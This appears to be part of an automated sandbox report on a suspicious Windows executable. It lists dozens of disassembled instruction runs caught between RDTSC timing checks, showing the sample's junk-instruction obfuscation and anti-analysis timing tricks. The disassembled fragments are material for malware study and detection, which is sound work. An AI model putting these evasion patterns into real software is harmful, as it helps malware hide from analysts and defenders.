Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59D14 second address: B59D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FF0EC6B64C6h 0x0000000f rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59D23 second address: B59D45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF0EC517C7Ch 0x0000000e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59D45 second address: B59D7A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0EC6B64D0h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF0EC6B64CFh 0x0000000f jmp 00007FF0EC6B64D2h 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59EF5 second address: B59F4D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF0EC517C76h 0x00000008 jmp 00007FF0EC517C7Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FF0EC517C81h 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 jmp 00007FF0EC517C89h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jnc 00007FF0EC517C76h 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59F4D second address: B59F53 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B2A655 second address: B2A65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B2A65B second address: B2A661 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B2A661 second address: B2A676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C80h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5AAD4 second address: B5AADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5E4B0 second address: B5E4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5E4B4 second address: B5E4CA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push ebx 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5E4CA second address: B5E4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c jnc 00007FF0EC517C76h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5E4E0 second address: B5E50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jbe 00007FF0EC6B64CEh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF0EC6B64CFh 0x00000019 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5E50B second address: B5E521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C81h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5E784 second address: B5E78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF0EC6B64C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5F9F1 second address: B5F9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5F9F7 second address: B5F9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5F9FB second address: B5FA0E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF0EC517C7Bh 0x0000000d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B661E1 second address: B661E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B661E5 second address: B661ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B661ED second address: B66207 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF0EC6B64CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FF0EC6B64C6h 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B66207 second address: B6620F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6569F second address: B656A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B65813 second address: B65838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF0EC517C84h 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B65838 second address: B6583E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6583E second address: B65847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B65847 second address: B6584C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6584C second address: B65882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C88h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FF0EC517C83h 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B65882 second address: B6589E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B659DF second address: B659E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B65F49 second address: B65F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B65F4F second address: B65F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6609C second address: B660A6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF0EC6B64C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B660A6 second address: B660BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0EC517C7Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B660BD second address: B660C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B67FB7 second address: B67FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B68592 second address: B68596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6873C second address: B68742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B68B57 second address: B68B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B68B5B second address: B68B70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a or esi, 7E605B50h 0x00000010 nop 0x00000011 pushad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B68C1D second address: B68C23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B68C23 second address: B68C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B68DAC second address: B68DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B68EC1 second address: B68EE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c jl 00007FF0EC517C76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B69615 second address: B696A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jne 00007FF0EC6B64CEh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FF0EC6B64C8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c pushad 0x0000002d mov cx, dx 0x00000030 sub cl, 00000054h 0x00000033 popad 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FF0EC6B64C8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 movsx esi, cx 0x00000053 or edi, 731DE286h 0x00000059 push 00000000h 0x0000005b jmp 00007FF0EC6B64CEh 0x00000060 push eax 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B696A6 second address: B696AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6A00C second address: B6A03C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF0EC6B64C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push esi 0x0000000e sub dword ptr [ebp+122D3179h], ebx 0x00000014 pop esi 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D302Fh] 0x0000001d push 00000000h 0x0000001f mov esi, 63665402h 0x00000024 xchg eax, ebx 0x00000025 jg 00007FF0EC6B64D0h 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6A03C second address: B6A05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF0EC517C87h 0x00000010 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6B11A second address: B6B131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 ja 00007FF0EC6B64C6h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FF0EC6B64C6h 0x00000017 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6D1D3 second address: B6D1DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF0EC517C76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B71C04 second address: B71C35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b clc 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+1244D635h], edx 0x00000014 push 00000000h 0x00000016 movzx ebx, di 0x00000019 mov ebx, dword ptr [ebp+122D2CB9h] 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 push edi 0x00000024 pop edi 0x00000025 pop esi 0x00000026 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B72BED second address: B72BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B72BF1 second address: B72C0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B77CAC second address: B77CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B77CB1 second address: B77D1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FF0EC6B64C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007FF0EC6B64C8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 je 00007FF0EC6B64C8h 0x00000049 mov bh, 17h 0x0000004b push 00000000h 0x0000004d stc 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FF0EC6B64CEh 0x00000056 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B79FE4 second address: B7A010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C7Fh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF0EC517C83h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B7A010 second address: B7A014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B7A014 second address: B7A01E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF0EC517C76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B7C71D second address: B7C723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B7D8BE second address: B7D8C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B81952 second address: B819A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FF0EC6B64D8h 0x00000012 push 00000000h 0x00000014 cld 0x00000015 push 00000000h 0x00000017 mov edi, 63BEA4AEh 0x0000001c push eax 0x0000001d pushad 0x0000001e jmp 00007FF0EC6B64D7h 0x00000023 je 00007FF0EC6B64CCh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B8294F second address: B82954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B82954 second address: B829C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FF0EC6B64C8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 jno 00007FF0EC6B64CCh 0x0000002b mov ebx, 08449803h 0x00000030 push 00000000h 0x00000032 mov ebx, dword ptr [ebp+122D30CEh] 0x00000038 push 00000000h 0x0000003a xor bx, 4791h 0x0000003f push eax 0x00000040 pushad 0x00000041 jo 00007FF0EC6B64D5h 0x00000047 jmp 00007FF0EC6B64CFh 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF0EC6B64CDh 0x00000053 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B829C9 second address: B829CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B69EA1 second address: B69EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B69EA6 second address: B69EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B69EB0 second address: B69EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6B9D5 second address: B6B9DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6C449 second address: B6C44F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6C44F second address: B6C453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6C453 second address: B6C461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6CF2A second address: B6CF42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C84h 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B73F5A second address: B73F74 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0EC6B64CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c je 00007FF0EC6B64CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B74E3D second address: B74E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C82h 0x00000009 popad 0x0000000a jl 00007FF0EC517C78h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FF0EC517C7Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B74E68 second address: B74E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B77EA0 second address: B77EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF0EC517C76h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B77EAB second address: B77EB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FF0EC6B64C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B8FF0E second address: B8FF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B8FF12 second address: B8FF2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B1CE62 second address: B1CE7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF0EC517C83h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B92AFB second address: B92B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FF0EC6B64CDh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B92B16 second address: B92B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B92B1B second address: B92B20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B92B20 second address: B92B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
